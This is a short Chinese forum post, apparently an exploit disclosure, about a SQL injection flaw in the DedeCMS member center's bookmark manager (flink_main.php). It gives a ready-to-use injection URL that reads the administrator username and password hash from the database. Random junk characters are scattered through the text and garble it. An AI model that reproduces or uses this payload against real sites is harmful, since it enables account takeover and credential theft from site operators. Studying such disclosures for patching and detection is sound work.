DedeCMS会员中心SQL注射漏洞) P4 R- D% t# A* T6 M& p
需要magic_quotes_gpc = Off: K! |' p0 G* a0 N$ ~: Q: `
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
8 y4 b9 x9 z9 i- p: S " I) _; X% c% a$ I
DedeCMS会员中心书签管理SQL注射漏洞' K& m- M: H2 H* P* ]0 |
成功利用该漏洞可获得管理员密码
$ U) v" H( c4 Q4 ~9 T$ h+ K 2 f' x9 |1 N' @* q) I% Q$ Z
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码& \& j D: ]; }' Y0 m) a! I
5 M( h' N4 ^" {9 H% d8 R: c
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r- a n1 i. `" W' v& F f
|
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59